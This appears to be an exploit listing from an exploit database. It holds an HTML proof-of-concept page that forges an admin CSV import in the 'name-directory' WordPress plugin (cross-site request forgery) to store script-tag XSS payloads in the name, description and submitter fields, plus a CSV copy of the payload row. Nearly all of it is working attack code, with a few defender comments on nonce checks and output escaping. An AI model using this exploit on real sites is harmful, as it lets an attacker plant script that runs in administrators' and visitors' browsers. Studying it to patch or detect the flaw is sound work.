## https://sploitus.com/exploit?id=WPEX-ID:D3653976-9E0A-4F2B-87F7-26B5E7A74B9D
<html>
  <body>
    <!--
      Proof-of-concept page for a cross-site request forgery against the
      import screen of the "name-directory" WordPress admin page.
      The forged upload contains no nonce or other anti-CSRF token field, so
      the request only succeeds if the server-side import handler does not
      verify one. example.com is a placeholder host.
      Defender note: an import handler that verifies a per-request nonce
      (for example check_admin_referer / wp_verify_nonce) and checks the
      caller's capability would reject this request. Escaping the stored
      fields on output (esc_html / esc_attr) would neutralise the markup.
    -->
    <script>
      // Builds and sends a multipart/form-data POST that imitates the plugin's
      // "Upload file and import" form. Takes no arguments and returns nothing;
      // the response is never read.
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        // Target: the import sub-page for directory id 11 (dir=11 is specific to the
        // test site; example.com is a placeholder).
        xhr.open("POST", "https:\/\/example.com\/wp-admin\/admin.php?page=name-directory&sub=import&dir=11", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
        // The boundary declared here must match the separators written by hand in
        // `body` below.
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------10045333971882101442027278436");
        // Ask the browser to attach the victim's cookies for the target origin.
        // NOTE(review): browsers that default cookies to SameSite=Lax may not send the
        // session cookie on this cross-site XHR, so reproduction can depend on browser
        // and cookie settings. Confirm in the test environment.
        xhr.withCredentials = true;
        // Hand-written multipart body with four parts:
        //   import        - a CSV file whose single data row puts a script element in
        //                   each of the name, description and submitter columns
        //                   (alert markers XSS-name, XSS-desc, XSS-sub)
        //   action        - "save"
        //   max_file_size - 16777216
        //   submit        - "Upload file and import"
        // No nonce / anti-CSRF token part is present.
        var body = "-----------------------------10045333971882101442027278436\r\n" + 
          "Content-Disposition: form-data; name=\"import\"; filename=\"name-directory-import-example.csv\"\r\n" + 
          "Content-Type: text/csv\r\n" + 
          "\r\n" + 
          "\"name\",\"description\",\"submitter\"\n" + 
          "\'\"\x3e\x3cscript\x3ealert(/XSS-name/)\x3c/script\x3e\',\'\"\x3e\x3cscript\x3ealert(/XSS-desc/)\x3c/script\x3e\',\'\"\x3e\x3cscript\x3ealert(/XSS-sub/)\x3c/script\x3e\'\n" + 
          "\r\n" + 
          "-----------------------------10045333971882101442027278436\r\n" + 
          "Content-Disposition: form-data; name=\"action\"\r\n" + 
          "\r\n" + 
          "save\r\n" + 
          "-----------------------------10045333971882101442027278436\r\n" + 
          "Content-Disposition: form-data; name=\"max_file_size\"\r\n" + 
          "\r\n" + 
          "16777216\r\n" + 
          "-----------------------------10045333971882101442027278436\r\n" + 
          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
          "\r\n" + 
          "Upload file and import\r\n" + 
          "-----------------------------10045333971882101442027278436--\r\n";
        // Copy the string one char code per byte and send it as a Blob, so the body
        // goes out as raw bytes rather than as a re-encoded string.
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <!-- Nothing is sent on page load; the request fires only when the button is clicked. -->
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>


As an admin, import the following CSV (the same row that the HTML page above submits in its `import` file part):

"name","description","submitter"
'"><script>alert(/XSS-name/)</script>','"><script>alert(/XSS-desc/)</script>','"><script>alert(/XSS-sub/)</script>'